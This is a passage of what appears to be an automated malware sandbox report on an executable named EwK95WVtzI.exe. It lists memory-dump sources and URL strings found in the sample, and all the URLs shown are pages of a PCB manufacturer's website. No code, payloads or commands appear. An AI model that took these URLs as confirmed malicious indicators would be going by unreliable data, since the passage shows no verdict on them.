00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/an-introduction-to-high-density-interconnect-hdi-pcbs/
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/components-parts/
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/customized-cable/
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/enclosure/
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/fpc-flexible-printed-circuits/
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/hdipcb/
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/myro-intelligent-cloud-forehead-thermometer/
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/pcb-capabilities/
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/pcb-design-layout/
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/pcb-restoration/
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/pcba-services/
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/special-offer-specifications/
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, 